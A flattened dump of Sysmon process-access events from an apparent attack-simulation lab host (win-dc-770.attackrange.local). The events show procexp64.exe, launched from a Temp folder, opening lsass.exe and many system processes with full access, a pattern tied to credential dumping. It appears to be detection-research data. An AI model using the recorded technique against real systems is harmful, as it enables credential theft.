15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 